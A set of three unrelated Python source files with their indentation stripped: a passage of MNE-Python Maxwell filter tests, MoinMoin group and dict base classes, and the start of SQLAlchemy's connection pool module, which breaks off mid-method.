med_tols = (1000., 21.4, 3.7)
origins = ((0., 0., 0.04), (0.,) * 3, (0., 0.02, 0.02))
coord_frames = ('head', 'meg', 'head')
raw_fnames = (raw_fname, erm_fname, sample_fname)
sss_fnames = (sss_reg_in_fname, sss_erm_reg_in_fname,
sss_samp_reg_in_fname)
comp_tols = [0, 1, 4]
for ii, rf in enumerate(raw_fnames):
raw = Raw(rf, allow_maxshield='yes').crop(0., 1.)
sss_reg_in = Raw(sss_fnames[ii])
# Test "in" regularization
raw_sss = maxwell_filter(raw, coord_frame=coord_frames[ii],
origin=origins[ii])
assert_meg_snr(raw_sss, sss_reg_in, min_tols[ii], med_tols[ii], msg=rf)
# check components match
_check_reg_match(raw_sss, sss_reg_in, comp_tols[ii])
def _check_reg_match(sss_py, sss_mf, comp_tol):
"""Helper to check regularization"""
info_py = sss_py.info['proc_history'][0]['max_info']['sss_info']
assert_true(info_py is not None)
assert_true(len(info_py) > 0)
info_mf = sss_mf.info['proc_history'][0]['max_info']['sss_info']
n_in = None
for inf in (info_py, info_mf):
if n_in is None:
n_in = _get_n_moments(inf['in_order'])
else:
assert_equal(n_in, _get_n_moments(inf['in_order']))
assert_equal(inf['components'][:n_in].sum(), inf['nfree'])
assert_allclose(info_py['nfree'], info_mf['nfree'],
atol=comp_tol, err_msg=sss_py._filenames[0])
@testing.requires_testing_data
def test_cross_talk():
"""Test Maxwell filter cross-talk cancellation"""
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
raw.info['bads'] = bads
sss_ctc = Raw(sss_ctc_fname)
raw_sss = maxwell_filter(raw, cross_talk=ctc_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, sss_ctc, 275.)
py_ctc = raw_sss.info['proc_history'][0]['max_info']['sss_ctc']
assert_true(len(py_ctc) > 0)
assert_raises(ValueError, maxwell_filter, raw, cross_talk=raw)
assert_raises(ValueError, maxwell_filter, raw, cross_talk=raw_fname)
mf_ctc = sss_ctc.info['proc_history'][0]['max_info']['sss_ctc']
del mf_ctc['block_id'] # we don't write this
assert_equal(object_diff(py_ctc, mf_ctc), '')
raw_ctf = Raw(fname_ctf_raw)
assert_raises(ValueError, maxwell_filter, raw_ctf) # cannot fit headshape
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04))
_assert_n_free(raw_sss, 68)
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04), ignore_ref=True)
_assert_n_free(raw_sss, 70)
raw_missing = raw.copy().crop(0, 0.1).load_data().pick_channels(
[raw.ch_names[pi] for pi in pick_types(raw.info, meg=True,
exclude=())[3:]])
with warnings.catch_warnings(record=True) as w:
maxwell_filter(raw_missing, cross_talk=ctc_fname)
assert_equal(len(w), 1)
assert_true('Not all cross-talk channels in raw' in str(w[0].message))
# MEG channels not in cross-talk
assert_raises(RuntimeError, maxwell_filter, raw_ctf, origin=(0., 0., 0.04),
cross_talk=ctc_fname)
@testing.requires_testing_data
def test_head_translation():
"""Test Maxwell filter head translation"""
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
# First try with an unchanged destination
raw_sss = maxwell_filter(raw, destination=raw_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_std_fname).crop(0., 1.), 200.)
# Now with default
with warnings.catch_warnings(record=True):
with catch_logging() as log:
raw_sss = maxwell_filter(raw, destination=mf_head_origin,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', verbose='warning')
assert_true('over 25 mm' in log.getvalue())
assert_meg_snr(raw_sss, Raw(sss_trans_default_fname), 125.)
destination = np.eye(4)
destination[2, 3] = 0.04
assert_allclose(raw_sss.info['dev_head_t']['trans'], destination)
# Now to sample's head pos
with warnings.catch_warnings(record=True):
with catch_logging() as log:
raw_sss = maxwell_filter(raw, destination=sample_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', verbose='warning')
assert_true('= 25.6 mm' in log.getvalue())
assert_meg_snr(raw_sss, Raw(sss_trans_sample_fname), 350.)
assert_allclose(raw_sss.info['dev_head_t']['trans'],
read_info(sample_fname)['dev_head_t']['trans'])
# Degenerate cases
assert_raises(RuntimeError, maxwell_filter, raw,
destination=mf_head_origin, coord_frame='meg')
assert_raises(ValueError, maxwell_filter, raw, destination=[0.] * 4)
# TODO: Eventually add simulation tests mirroring Taulu's original paper
# that calculates the localization error:
# http://ieeexplore.ieee.org/xpl/articleDetails.jsp?arnumber=1495874
def _assert_shielding(raw_sss, erm_power, shielding_factor, meg='mag'):
"""Helper to assert a minimum shielding factor using empty-room power"""
picks = pick_types(raw_sss.info, meg=meg)
sss_power = raw_sss[picks][0].ravel()
sss_power = np.sqrt(np.sum(sss_power * sss_power))
factor = erm_power / sss_power
assert_true(factor >= shielding_factor,
'Shielding factor %0.3f < %0.3f' % (factor, shielding_factor))
@slow_test
@requires_svd_convergence
@testing.requires_testing_data
def test_shielding_factor():
"""Test Maxwell filter shielding factor using empty room"""
raw_erm = Raw(erm_fname, allow_maxshield='yes', preload=True)
picks = pick_types(raw_erm.info, meg='mag')
erm_power = raw_erm[picks][0]
erm_power = np.sqrt(np.sum(erm_power * erm_power))
# Vanilla SSS (second value would be for meg=True instead of meg='mag')
_assert_shielding(Raw(sss_erm_std_fname), erm_power, 10) # 1.5)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None)
_assert_shielding(raw_sss, erm_power, 12) # 1.5)
# Fine cal
_assert_shielding(Raw(sss_erm_fine_cal_fname), erm_power, 12) # 2.0)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
origin=mf_meg_origin,
calibration=fine_cal_fname)
_assert_shielding(raw_sss, erm_power, 12) # 2.0)
# Crosstalk
_assert_shielding(Raw(sss_erm_ctc_fname), erm_power, 12) # 2.1)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
origin=mf_meg_origin,
cross_talk=ctc_fname)
_assert_shielding(raw_sss, erm_power, 12) # 2.1)
# Fine cal + Crosstalk
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
calibration=fine_cal_fname,
origin=mf_meg_origin,
cross_talk=ctc_fname)
_assert_shielding(raw_sss, erm_power, 13) # 2.2)
# tSSS
_assert_shielding(Raw(sss_erm_st_fname), erm_power, 37) # 5.8)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
origin=mf_meg_origin, st_duration=1.)
_assert_shielding(raw_sss, erm_power, 37) # 5.8)
# Crosstalk + tSSS
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
cross_talk=ctc_fname, origin=mf_meg_origin,
st_duration=1.)
_assert_shielding(raw_sss, erm_power, 38) # 5.91)
# Fine cal + tSSS
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
calibration=fine_cal_fname,
origin=mf_meg_origin, st_duration=1.)
_assert_shielding(raw_sss, erm_power, 38) # 5.98)
# Fine cal + Crosstalk + tSSS
_assert_shielding(Raw(sss_erm_st1FineCalCrossTalk_fname),
erm_power, 39) # 6.07)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg', regularize=None,
calibration=fine_cal_fname, origin=mf_meg_origin,
cross_talk=ctc_fname, st_duration=1.)
_assert_shielding(raw_sss, erm_power, 39) # 6.05)
# Fine cal + Crosstalk + tSSS + Reg-in
_assert_shielding(Raw(sss_erm_st1FineCalCrossTalkRegIn_fname), erm_power,
57) # 6.97)
raw_sss = maxwell_filter(raw_erm, calibration=fine_cal_fname,
cross_talk=ctc_fname, st_duration=1.,
origin=mf_meg_origin,
coord_frame='meg', regularize='in')
_assert_shielding(raw_sss, erm_power, 53) # 6.64)
raw_sss = maxwell_filter(raw_erm, calibration=fine_cal_fname,
cross_talk=ctc_fname, st_duration=1.,
coord_frame='meg', regularize='in')
_assert_shielding(raw_sss, erm_power, 58) # 7.0)
raw_sss = maxwell_filter(raw_erm, calibration=fine_cal_fname_3d,
cross_talk=ctc_fname, st_duration=1.,
coord_frame='meg', regularize='in')
# Our 3D cal has worse defaults for this ERM than the 1D file
_assert_shielding(raw_sss, erm_power, 54)
# Show it by rewriting the 3D as 1D and testing it
temp_dir = _TempDir()
temp_fname = op.join(temp_dir, 'test_cal.dat')
with open(fine_cal_fname_3d, 'r') as fid:
with open(temp_fname, 'w') as fid_out:
for line in fid:
fid_out.write(' '.join(line.strip().split(' ')[:14]) + '\n')
raw_sss = maxwell_filter(raw_erm, calibration=temp_fname,
cross_talk=ctc_fname, st_duration=1.,
coord_frame='meg', regularize='in')
# Our 3D cal has worse defaults for this ERM than the 1D file
_assert_shielding(raw_sss, erm_power, 44)
@slow_test
@requires_svd_convergence
@testing.requires_testing_data
def test_all():
"""Test maxwell filter using all options"""
raw_fnames = (raw_fname, raw_fname, erm_fname, sample_fname)
sss_fnames = (sss_st1FineCalCrossTalkRegIn_fname,
sss_st1FineCalCrossTalkRegInTransSample_fname,
sss_erm_st1FineCalCrossTalkRegIn_fname,
sss_samp_fname)
fine_cals = (fine_cal_fname,
fine_cal_fname,
fine_cal_fname,
fine_cal_mgh_fname)
coord_frames = ('head', 'head', 'meg', 'head')
ctcs = (ctc_fname, ctc_fname, ctc_fname, ctc_mgh_fname)
mins = (3.5, 3.5, 1.2, 0.9)
meds = (10.8, 10.4, 3.2, 6.)
st_durs = (1., 1., 1., None)
destinations = (None, sample_fname, None, None)
origins = (mf_head_origin,
mf_head_origin,
mf_meg_origin,
mf_head_origin)
for ii, rf in enumerate(raw_fnames):
raw = Raw(rf, allow_maxshield='yes').crop(0., 1.)
with warnings.catch_warnings(record=True): # head fit off-center
sss_py = maxwell_filter(
raw, calibration=fine_cals[ii], cross_talk=ctcs[ii],
st_duration=st_durs[ii], coord_frame=coord_frames[ii],
destination=destinations[ii], origin=origins[ii])
sss_mf = Raw(sss_fnames[ii])
assert_meg_snr(sss_py, sss_mf, mins[ii], meds[ii], msg=rf)
@slow_test
@requires_svd_convergence
@testing.requires_testing_data
def test_triux():
"""Test TRIUX system support"""
raw = Raw(tri_fname).crop(0, 0.999)
raw.fix_mag_coil_types()
# standard
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None)
assert_meg_snr(sss_py, Raw(tri_sss_fname), 37, 700)
# cross-talk
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
cross_talk=tri_ctc_fname)
assert_meg_snr(sss_py, Raw(tri_sss_ctc_fname), 35, 700)
# fine cal
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
calibration=tri_cal_fname)
assert_meg_snr(sss_py, Raw(tri_sss_cal_fname), 31, 360)
# ctc+cal
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
calibration=tri_cal_fname,
cross_talk=tri_ctc_fname)
assert_meg_snr(sss_py, Raw(tri_sss_ctc_cal_fname), 31, 350)
# regularization
sss_py = maxwell_filter(raw, coord_frame='meg', regularize='in')
sss_mf = Raw(tri_sss_reg_fname)
assert_meg_snr(sss_py, sss_mf, 0.6, 9)
_check_reg_match(sss_py, sss_mf, 1)
# all three
sss_py = maxwell_filter(raw, coord_frame='meg', regularize='in',
calibration=tri_cal_fname,
cross_talk=tri_ctc_fname)
sss_mf = Raw(tri_sss_ctc_cal_reg_in_fname)
assert_meg_snr(sss_py, sss_mf, 0.6, 9)
_check_reg_match(sss_py, sss_mf, 1)
# tSSS
raw = Raw(tri_fname).fix_mag_coil_types()
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
st_duration=4., verbose=True)
assert_meg_snr(sss_py, Raw(tri_sss_st4_fname), 700., 1600)
run_tests_if_main()
|
|
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - base classes for datastructs.
@copyright: 2009 MoinMoin:DmitrijsMilajevs
@license: GPL, see COPYING for details
"""
from UserDict import DictMixin
class GroupDoesNotExistError(Exception):
"""
Raised when a group name is not found in the backend.
"""
class DictDoesNotExistError(Exception):
"""
Raised when a dict name is not found in the backend.
"""
class BaseGroup(object):
"""
Group is something which stores members. Groups are immutable. A
member is some arbitrary entity name (Unicode object).
"""
def __init__(self, request, name, backend):
"""
Initialize a group.
@param request
@param name: moin group name
@backend: backend object which created this object
"""
self.request = request
self.name = name
self._backend = backend
def __contains__(self, member, processed_groups=None):
raise NotImplementedError()
def __iter__(self, yielded_members=None, processed_groups=None):
raise NotImplementedError()
class BaseGroupsBackend(object):
"""
Backend provides access to the group definitions for the other
MoinMoin code.
"""
def __init__(self, request):
self.request = request
self.page_group_regex = request.cfg.cache.page_group_regexact
def is_group_name(self, member):
return self.page_group_regex.match(member)
def __contains__(self, group_name):
"""
Check if a group called <group_name> is available in this backend.
"""
raise NotImplementedError()
def __iter__(self):
"""
Iterate over moin group names of the groups defined in this backend.
@return: moin group names
"""
raise NotImplementedError()
def __getitem__(self, group_name):
"""
Get a group by its moin group name.
"""
raise NotImplementedError()
def __repr__(self):
return "<%s groups=%s>" % (self.__class__, list(self))
def _retrieve_members(self, group_name):
raise NotImplementedError()
def groups_with_member(self, member):
"""
List all group names of groups containing <member>.
@param member: member name [unicode]
@return: list of group names [unicode]
"""
for group_name in self:
try:
if member in self[group_name]:
yield group_name
except GroupDoesNotExistError:
pass
def get(self, key, default=None):
"""
Return the group named <key> if key is in the backend, else
default. If default is not given, it defaults to None, so that
this method never raises a GroupDoesNotExistError.
"""
try:
return self[key]
except GroupDoesNotExistError:
return default
class LazyGroup(BaseGroup):
"""
A lazy group does not store members internally, but gets them from
a backend when needed.
Lazy group is made only of members. It can not consist of other groups.
For instance, this is a possible LazyGroup:
PossibleGroup
* OneMember
* OtherMember
This is a group which cannot be LazyGroup:
NotPossibleGroup
* OneMember
* OtherMember
* OtherGroup
"""
def __init__(self, request, name, backend):
super(LazyGroup, self).__init__(request, name, backend)
if name not in backend:
raise GroupDoesNotExistError(name)
def __contains__(self, member, processed_groups=None):
# processed_groups are not used here but other group classes
# may expect this parameter.
return self._backend._group_has_member(self.name, member)
def __iter__(self, yielded_members=None, processed_groups=None):
# processed_groups are not used here but other group classes
# may expect this parameter.
if yielded_members is None:
yielded_members = set()
for member in self._backend._iter_group_members(self.name):
if member not in yielded_members:
yielded_members.add(member)
yield member
class LazyGroupsBackend(BaseGroupsBackend):
def _iter_group_members(self, group_name):
raise NotImplementedError()
def _group_has_member(self, group_name, member):
raise NotImplementedError()
class GreedyGroup(BaseGroup):
"""
GreedyGroup gets all members during initialization and stores them internally.
Members of a group may be names of other groups.
"""
def __init__(self, request, name, backend):
super(GreedyGroup, self).__init__(request, name, backend)
self.members, self.member_groups = self._load_group()
def _load_group(self):
"""
Retrieve group data from the backend and filter it to members and group_members.
"""
members_retrieved = set(self._backend._retrieve_members(self.name))
member_groups = set(member for member in members_retrieved if self._backend.is_group_name(member))
members = members_retrieved - member_groups
return members, member_groups
def __contains__(self, member, processed_groups=None):
"""
First check if <member> is part of this group and then check
for every subgroup in this group.
<processed_groups> is needed to avoid infinite recursion, if
groups are defined recursively.
@param member: member name [unicode]
@param processed_groups: groups which were checked for containment before [set]
"""
if processed_groups is None:
processed_groups = set()
processed_groups.add(self.name)
if member in self.members or member in self.member_groups:
return True
else:
groups = self.request.groups
for group_name in self.member_groups:
if group_name not in processed_groups and group_name in groups and groups[group_name].__contains__(member, processed_groups):
return True
return False
def __iter__(self, yielded_members=None, processed_groups=None):
"""
Iterate first over members of this group, then over subgroups of this group.
<yielded_members> and <processed_groups> are needed to avoid infinite recursion.
This can happen if there are two groups like these:
OneGroup: Something, OtherGroup
OtherGroup: OneGroup, SomethingOther
@param yielded_members: members which have been already yielded before [set]
@param processed_groups: group names which have been iterated before [set]
"""
if processed_groups is None:
processed_groups = set()
if yielded_members is None:
yielded_members = set()
processed_groups.add(self.name)
for member in self.members:
if member not in yielded_members:
yielded_members.add(member)
yield member
groups = self.request.groups
for group_name in self.member_groups:
if group_name not in processed_groups:
if group_name in groups:
for member in groups[group_name].__iter__(yielded_members, processed_groups):
yield member
else:
yield group_name
def __repr__(self):
return "<%s name=%s members=%s member_groups=%s>" % (self.__class__,
self.name,
self.members,
self.member_groups)
class BaseDict(object, DictMixin):
def __init__(self, request, name, backend):
"""
Initialize a dict. Dicts are greedy, it stores all keys and
items internally.
@param request
@param name: moin dict name
@backend: backend object which created this object
"""
self.request = request
self.name = name
self._backend = backend
self._dict = self._load_dict()
def __iter__(self):
return self._dict.__iter__()
def keys(self):
return list(self)
def __len__(self):
return self._dict.__len__()
def __getitem__(self, key):
return self._dict[key]
def get(self, key, default=None):
"""
Return the value if key is in the dictionary, else default. If
default is not given, it defaults to None, so that this method
never raises a KeyError.
"""
return self._dict.get(key, default)
def _load_dict(self):
"""
Retrieve dict data from the backend.
"""
return self._backend._retrieve_items(self.name)
def __repr__(self):
return "<%r name=%r items=%r>" % (self.__class__, self.name, self._dict.items())
class BaseDictsBackend(object):
def __init__(self, request):
self.request = request
self.page_dict_regex = request.cfg.cache.page_dict_regexact
def is_dict_name(self, name):
return self.page_dict_regex.match(name)
def __contains__(self, dict_name):
"""
Check if a dict called <dict_name> is available in this backend.
"""
raise NotImplementedError()
def __getitem__(self, dict_name):
"""
Get a dict by its moin dict name.
"""
raise NotImplementedError()
def _retrieve_items(self, dict_name):
raise NotImplementedError()
def get(self, key, default=None):
"""
Return the dictionary named <key> if key is in the backend,
else default. If default is not given, it defaults to None, so
that this method never raises a DictDoesNotExistError.
"""
try:
return self[key]
except DictDoesNotExistError:
return default
|
|
# sqlalchemy/pool.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Connection pooling for DB-API connections.
Provides a number of connection pool implementations for a variety of
usage scenarios and thread behavior requirements imposed by the
application, DB-API or database itself.
Also provides a DB-API 2.0 connection proxying mechanism allowing
regular DB-API connect() methods to be transparently managed by a
SQLAlchemy connection pool.
"""
import time
import traceback
import weakref
from . import exc, log, event, interfaces, util
from .util import queue as sqla_queue
from .util import threading, memoized_property, \
chop_traceback
from collections import deque
proxies = {}
def manage(module, **params):
"""Return a proxy for a DB-API module that automatically
pools connections.
Given a DB-API 2.0 module and pool management parameters, returns
a proxy for the module that will automatically pool connections,
creating new connection pools for each distinct set of connection
arguments sent to the decorated module's connect() function.
:param module: a DB-API 2.0 database module
:param poolclass: the class used by the pool module to provide
pooling. Defaults to :class:`.QueuePool`.
:param \*\*params: will be passed through to *poolclass*
"""
try:
return proxies[module]
except KeyError:
return proxies.setdefault(module, _DBProxy(module, **params))
def clear_managers():
"""Remove all current DB-API 2.0 managers.
All pools and connections are disposed.
"""
for manager in proxies.values():
manager.close()
proxies.clear()
reset_rollback = util.symbol('reset_rollback')
reset_commit = util.symbol('reset_commit')
reset_none = util.symbol('reset_none')
class _ConnDialect(object):
"""partial implementation of :class:`.Dialect`
which provides DBAPI connection methods.
When a :class:`.Pool` is combined with an :class:`.Engine`,
the :class:`.Engine` replaces this with its own
:class:`.Dialect`.
"""
def do_rollback(self, dbapi_connection):
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
dbapi_connection.commit()
def do_close(self, dbapi_connection):
dbapi_connection.close()
class Pool(log.Identified):
"""Abstract base class for connection pools."""
_dialect = _ConnDialect()
def __init__(self,
creator, recycle=-1, echo=None,
use_threadlocal=False,
logging_name=None,
reset_on_return=True,
listeners=None,
events=None,
_dispatch=None,
_dialect=None):
"""
Construct a Pool.
:param creator: a callable function that returns a DB-API
connection object. The function will be called with
parameters.
:param recycle: If set to non -1, number of seconds between
connection recycling, which means upon checkout, if this
timeout is surpassed the connection will be closed and
replaced with a newly opened connection. Defaults to -1.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
:param echo: If True, connections being pulled and retrieved
from the pool will be logged to the standard output, as well
as pool sizing information. Echoing can also be achieved by
enabling logging for the "sqlalchemy.pool"
namespace. Defaults to False.
:param use_threadlocal: If set to True, repeated calls to
:meth:`connect` within the same application thread will be
guaranteed to return the same connection object, if one has
already been retrieved from the pool and has not been
returned yet. Offers a slight performance advantage at the
cost of individual transactions by default. The
:meth:`.Pool.unique_connection` method is provided to return
a consistenty unique connection to bypass this behavior
when the flag is set.
.. warning:: The :paramref:`.Pool.use_threadlocal` flag
**does not affect the behavior** of :meth:`.Engine.connect`.
:meth:`.Engine.connect` makes use of the
:meth:`.Pool.unique_connection` method which **does not use thread
local context**. To produce a :class:`.Connection` which refers
to the :meth:`.Pool.connect` method, use
:meth:`.Engine.contextual_connect`.
Note that other SQLAlchemy connectivity systems such as
:meth:`.Engine.execute` as well as the orm
:class:`.Session` make use of
:meth:`.Engine.contextual_connect` internally, so these functions
are compatible with the :paramref:`.Pool.use_threadlocal` setting.
.. seealso::
:ref:`threadlocal_strategy` - contains detail on the
"threadlocal" engine strategy, which provides a more comprehensive
approach to "threadlocal" connectivity for the specific
use case of using :class:`.Engine` and :class:`.Connection` objects
directly.
:param reset_on_return: Determine steps to take on
connections as they are returned to the pool.
reset_on_return can have any of these values:
* ``"rollback"`` - call rollback() on the connection,
to release locks and transaction resources.
This is the default value. The vast majority
of use cases should leave this value set.
* ``True`` - same as 'rollback', this is here for
backwards compatibility.
* ``"commit"`` - call commit() on the connection,
to release locks and transaction resources.
A commit here may be desirable for databases that
cache query plans if a commit is emitted,
such as Microsoft SQL Server. However, this
value is more dangerous than 'rollback' because
any data changes present on the transaction
are committed unconditionally.
* ``None`` - don't do anything on the connection.
This setting should only be made on a database
that has no transaction support at all,
namely MySQL MyISAM. By not doing anything,
performance can be improved. This
setting should **never be selected** for a
database that supports transactions,
as it will lead to deadlocks and stale
state.
* ``"none"`` - same as ``None``
.. versionadded:: 0.9.10
* ``False`` - same as None, this is here for
backwards compatibility.
.. versionchanged:: 0.7.6
:paramref:`.Pool.reset_on_return` accepts ``"rollback"``
and ``"commit"`` arguments.
:param events: a list of 2-tuples, each of the form
``(callable, target)`` which will be passed to :func:`.event.listen`
upon construction. Provided here so that event listeners
can be assigned via :func:`.create_engine` before dialect-level
listeners are applied.
:param listeners: Deprecated. A list of
:class:`~sqlalchemy.interfaces.PoolListener`-like objects or
dictionaries of callables that receive events when DB-API
connections are created, checked out and checked in to the
pool. This has been superseded by
:func:`~sqlalchemy.event.listen`.
"""
if logging_name:
self.logging_name = self._orig_logging_name = logging_name
else:
self._orig_logging_name = None
log.instance_logger(self, echoflag=echo)
self._threadconns = threading.local()
self._creator = creator
self._recycle = recycle
self._invalidate_time = 0
self._use_threadlocal = use_threadlocal
if reset_on_return in ('rollback', True, reset_rollback):
self._reset_on_return = reset_rollback
elif reset_on_return in ('none', None, False, reset_none):
self._reset_on_return = reset_none
elif reset_on_return in ('commit', reset_commit):
self._reset_on_return = reset_commit
else:
raise exc.ArgumentError(
"Invalid value for 'reset_on_return': %r"
% reset_on_return)
self.echo = echo
if _dispatch:
self.dispatch._update(_dispatch, only_propagate=False)
if _dialect:
self._dialect = _dialect
if events:
for fn, target in events:
event.listen(self, target, fn)
if listeners:
util.warn_deprecated(
"The 'listeners' argument to Pool (and "
"create_engine()) is deprecated. Use event.listen().")
for l in listeners:
self.add_listener(l)
@property
def _creator(self):
return self.__dict__['_creator']
@_creator.setter
def _creator(self, creator):
self.__dict__['_creator'] = creator
self._invoke_creator = self._should_wrap_creator(creator)
def _should_wrap_creator(self, creator):
"""Detect if creator accepts a single argument, or is sent
as a legacy style no-arg function.
"""
try:
argspec = util.get_callable_argspec(self._creator, no_self=True)
except TypeError:
return lambda crec: creator()
defaulted = argspec[3] is not None and len(argspec[3]) or 0
positionals = len(argspec[0]) - defaulted
# look for the exact arg signature that DefaultStrategy
# sends us
if (argspec[0], argspec[3]) == (['connection_record'], (None,)):
return creator
# or just a single positional
elif positionals == 1:
return creator
# all other cases, just wrap and assume legacy "creator" callable
# thing
else:
return lambda crec: creator()
def _close_connection(self, connection):
self.logger.debug("Closing connection %r", connection)
try:
self._dialect.do_close(connection)
except Exception:
self.logger.error("Exception closing connection %r",
connection, exc_info=True)
@util.deprecated(
2.7, "Pool.add_listener is deprecated. Use event.listen()")
def add_listener(self, listener):
"""Add a :class:`.PoolListener`-like object to this pool.
``listener`` may be an object that implements some or all of
PoolListener, or a dictionary of callables containing implementations
of some or all of the named methods in PoolListener.
"""
interfaces.PoolListener._adapt_listener(self, listener)
def unique_connection(self):
"""Produce a DBAPI connection that is not referenced by any
thread-local context.
This method is equivalent to :meth:`.Pool.connect` when the
:paramref:`.Pool.use_threadlocal` flag is not set to True.
When :paramref:`.Pool.use_threadlocal` is True, the
:meth:`.Pool.unique_connection` method provides a means of bypassing
the threadlocal context.
"""
return _ConnectionFairy._checkout(self)
def _create_connection(self):
"""Called by subclasses to create a new ConnectionRecord."""
return _ConnectionRecord(self)
def _invalidate(self, connection, exception=None):
"""Mark all connections established within the generation
of the given connection as invalidated.
If this pool's last invalidate time is before when the given
connection was created, update the timestamp til now. Otherwise,
no action is performed.
Connections with a start time prior to this pool's invalidation
time will be recycled upon next checkout.
"""
rec = getattr(connection, "_connection_record", None)
if not rec or self._invalidate_time < rec.starttime:
self._invalidate_time = time.time()
if getattr(connection, 'is_valid', False):
connection.invalidate(exception)
def recreate(self):
"""Return a new :class:`.Pool`, of the same class as this one
and configured with identical creation arguments.
This method is used in conjunction with :meth:`dispose`
to close out an entire :class:`.Pool` and create a new one in
its place.
"""
raise NotImplementedError()
def dispose(self):
"""Dispose of this pool.
This method leaves the possibility of checked-out connections
remaining open, as it only affects connections that are
idle in the pool.
See also the :meth:`Pool.recreate` method.
"""
raise NotImplementedError()
def connect(self):
"""Return a DBAPI connection from the pool.
The connection is instrumented such that when its
``close()`` method is called, the connection will be returned to
the pool.
"""
if not self._use_threadlocal:
return _ConnectionFairy._checkout(self)
try:
rec = self._threadconns.current()
except AttributeError:
pass
else:
if rec is not None:
return rec._checkout_existing()
return _ConnectionFairy._checkout(self, self._threadconns)
def _return_conn(self, record):
"""Given a _ConnectionRecord, return it to the :class:`.Pool`.
This method is called when an instrumented DBAPI connection
has its ``close()`` method called.
"""
if self._use_threadlocal:
try:
del self._threadconns.current
except AttributeError:
pass
self._do_return_conn(record)
def _do_get(self):
"""Implementation for :meth:`get`, supplied by subclasses."""
raise NotImplementedError()
def _do_return_conn(self, conn):
"""Implementation for :meth:`return_conn`, supplied by subclasses."""
raise NotImplementedError()
def status(self):
raise NotImplementedError()
class _ConnectionRecord(object):
"""Internal object which maintains an individual DBAPI connection
referenced by a :class:`.Pool`.
The :class:`._ConnectionRecord` object always exists for any particular
DBAPI connection whether or not that DBAPI connection has been
"checked out". This is in contrast to the :class:`._ConnectionFairy`
which is only a public facade to the DBAPI connection while it is checked
out.
A :class:`._ConnectionRecord` may exist for a span longer than that
of a single DBAPI connection. For example, if the
:meth:`._ConnectionRecord.invalidate`
method is called, the DBAPI connection associated with this
:class:`._ConnectionRecord`
will be discarded, but the :class:`._ConnectionRecord` may be used again,
in which case a new DBAPI connection is produced when the :class:`.Pool`
next uses this record.
The :class:`._ConnectionRecord` is delivered along with connection
pool events, including :meth:`.PoolEvents.connect` and
:meth:`.PoolEvents.checkout`, however :class:`._ConnectionRecord` still
remains an internal object whose API and internals may change.
.. seealso::
:class:`._ConnectionFairy`
"""
def __init__(self, pool):
self.__pool = pool
self.__connect(first_connect_check=True)
self.finalize_callback = deque()
connection = None
"""A reference to the actual DBAPI connection being tracked.
May be ``None`` if this :class:`._ConnectionRecord` has been marked
as invalidated; a new DBAPI connection may replace it if the owning
pool calls upon this :class:`._ConnectionRecord` to reconnect.
"""
_soft_invalidate_time = 0
@util.memoized_property
def info(self):
"""The ``.info`` dictionary associated with the DBAPI connection.
This dictionary is shared among the :attr:`._ConnectionFairy.info`
and :attr:`.Connection.info` accessors.
"""
return {}
@classmethod
def checkout(cls, pool):
rec = pool._do_get()
try:
dbapi_connection = rec.get_connection()
except:
with util.safe_reraise():
rec.checkin()
echo = pool._should_log_debug()
fairy = _ConnectionFairy(dbapi_connection, rec, echo)
rec.fairy_ref = weakref.ref(
fairy,
lambda ref: _finalize_fairy and
_finalize_fairy(
dbapi_connection,
rec, pool, ref, echo)
)
_refs.add(rec)
if echo:
pool.logger.debug("Connection %r checked out from pool",
dbapi_connection)
return fairy
def checkin(self):
self.fairy_ref = None
connection = self.connection
pool = self.__pool
while self.finalize_callback:
finalizer = self.finalize_callback.pop()
finalizer(connection)
if pool.dispatch.checkin:
pool.dispatch.checkin(connection, self)
pool._return_conn(self)
def close(self):
if self.connection is not None:
self.__close()
def invalidate(self, e=None, soft=False):
"""Invalidate the DBAPI connection held by this :class:`._ConnectionRecord`.
This method is called for all connection invalidations, including
when the :meth:`._ConnectionFairy.invalidate` or
:meth:`.Connection.invalidate` methods are called, as well as when any
so-called "automatic invalidation" condition occurs.
:param e: an exception object indicating a reason for the invalidation.
:param soft: if True, the connection isn't closed; instead, this
connection will be recycled on next checkout.
.. versionadded:: 1.0.3
.. seealso::
:ref:`pool_connection_invalidation`
"""
# already invalidated
if self.connection is None:
return
if soft:
self.__pool.dispatch.soft_invalidate(self.connection, self, e)
else:
self.__pool.dispatch.invalidate(self.connection, self, e)
if e is not None:
self.__pool.logger.info(
"%sInvalidate connection %r (reason: %s:%s)",
"Soft " if soft else "",
self.connection, e.__class__.__name__, e)
else:
self.__pool.logger.info(
"%sInvalidate connection %r",
"Soft " if soft else "",
self.connection)
if soft:
self._soft_invalidate_time = time.time()
else:
self.__close()
self.connection = None
def get_connection(self):
recycle = False
if self.connection is None:
self.info.clear()
self.__connect()
elif self.__pool._recycle > -1 and \
time.time() - self.starttime > self.__pool._recycle:
